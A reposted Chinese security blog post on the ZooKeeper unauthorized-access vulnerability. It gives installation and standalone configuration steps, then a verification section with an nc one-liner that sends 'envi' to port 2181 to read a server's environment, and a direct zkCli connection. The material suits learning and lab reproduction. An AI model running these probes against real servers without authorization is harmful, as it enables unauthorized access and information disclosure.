ZooKeeper 未授权访问漏洞

Posted 专注于网络安全

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ZooKeeper 未授权访问漏洞相关的知识,希望对你有一定的参考价值。

 

ZooKeeper 安装:

Zookeeper的默认开放端口是2181

wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz

tar -zxvf zookeepre-3.4.10.tar.gz
cd zookeeper-3.4.10/
cd conf/
vi zoo.cfg
###配置单机模式
tickTime=2000    
dataDir=/tmp/zookeeper/data    
dataLogDir=/tmp/zookeeper/logs    
clientPort=2181 

bin/zkServer.sh start   //启动
#启动client连接server
bin/zkCli.sh -server localhost:2181 

漏洞验证:

执行以下命令即可远程获取该服务器的环境:

echo envi|nc 192.168.15.74 2181

直接连接:
./zkCli.sh -server ip:port

 

 

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

 

 

 

参考链接:

Zookeeper 安装和配置

http://coolxing.iteye.com/blog/1871009

以上是关于ZooKeeper 未授权访问漏洞的主要内容,如果未能解决你的问题,请参考以下文章

ZooKeeper 未授权访问漏洞

复现CVE-2014-085(Apache ZooKeeper 未授权访问漏洞)

Apache Zookeeper 未授权访问漏洞原理扫描

目标Zookeeper未授权访问(漏洞复现)

目标Zookeeper未授权访问(漏洞复现)

zookeeper的未授权访问漏洞问题